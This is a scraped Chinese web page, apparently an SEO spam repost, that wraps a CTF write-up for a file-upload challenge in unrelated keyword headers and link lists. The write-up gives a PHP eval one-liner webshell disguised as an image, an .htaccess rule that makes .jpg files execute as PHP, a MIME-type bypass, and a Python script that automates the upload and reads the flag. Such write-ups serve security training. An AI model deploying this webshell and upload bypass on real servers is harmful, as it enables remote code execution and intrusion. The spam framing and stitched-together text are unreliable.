当前位置: 首页 > news >正文

安吉做企业网站最新的军事新闻

安吉做企业网站,最新的军事新闻,asp网站模板源码,投资公司名称大全简单大气尝试上传.htaccess和图片和一句话木马提示 php文件提示 响应头可以看到 构造一句话图片木马如下&#xff1a; <script languagephp>eval($_POST[cmd]);</script> 上传成功 必须增加文件夹下jpg后缀解析php .htaccess如下 <FilesMatch "jpg">Set…

尝试上传.htaccess和图片和一句话木马提示

 php文件提示

 响应头可以看到

 构造一句话图片木马如下:

<script language='php'>eval($_POST['cmd']);</script> 上传成功

 必须增加文件夹下jpg后缀解析php

.htaccess如下

<FilesMatch "jpg">SetHandler application/x-httpd-php</FilesMatch>

需要修改文件类型,image/jpeg,如下,上传成功

蚁剑链接

根据刚才上传图片木马的地址,用蚁剑链接如下

http://a756579c-2d99-4546-b126-d1099134f355.node5.buuoj.cn:81/upload/5337bb98317fcb575ce52329036efce2/u1.jpg

 根目录下发现flag

flag{b35d29a2-b3da-42db-9f8b-9ca91436173e}

参考python方案:

import requests
url = "http://172.21.4.12:10011/"
session = requests.session()
htaccess = {'uploaded': ('.htaccess', "SetHandler application/x-httpd-php", 'image/jpeg')}
res_hta = session.post(url, files=htaccess)files = {'uploaded': ('123.jpg', "<script language=\"php\">echo file_get_contents(\"/flag\");</script>", 'image/jpeg')}
res_jpg = session.post(url, files=files)res_shell = session.post(url + res_jpg.text[-69:-22], data = {'a':'echo file_get_contents(\'/flag\');'})print(res_shell.text)

http://www.mmbaike.com/news/106090.html

相关文章:

  • 山西太原门户网站开发公司网络营销品牌策划
  • 专题网站开发工具有哪些打开网址资料网站
  • 网站备案注销怎么恢复域名检测查询
  • 有了域名和主机怎么做网站怎样搭建一个网站
  • 西安网站建设首选那家网络推广的方法有多选题
  • 网站建设免费书app推广全国代理加盟
  • 网站建站开发上海做网站优化
  • 最常访问的网址seo排名官网
  • 怎样做化妆品公司网站微信广告
  • 要怎么做自己的网站视频教学网站百度手机端排名怎么查询
  • 淘客个人网站怎么建设什么是网络营销渠道
  • wordpress 切换域名兰州seo推广
  • 室内设计师需要考什么证海淀区seo搜索优化
  • 找哪个公司做网站推广最好免费推广网站2023
  • 花瓣官网设计网站搜关键词网站
  • 公众号怎么推广产品站长seo推广
  • 赣州那里有做网站的公司全网搜索引擎优化
  • 江都网站制作网络推广公司简介
  • 橙子建站是什么软件电脑培训网上课程
  • 宁波定制网站建设解决方案长春做网站推荐选吉网传媒好
  • 漳州港建设规划局网站怎么给公司做网站
  • 天津建委招标网站北京seo服务行者
  • 好男人的最好的影院重庆seo网络营销
  • 免费做企业网站网站建设网站定制
  • 做网站开发前景如何适合seo的建站系统
  • 二级域名解析网seo搜索优化费用
  • 罗湖网站建设价格嘉兴网站建设制作
  • 企业网站怎么做产品图片轮播近期出现的病毒叫什么
  • 营销型网站建设与网页设计网络站点推广的方法有哪些
  • com网站怎么注册怎么发布信息到百度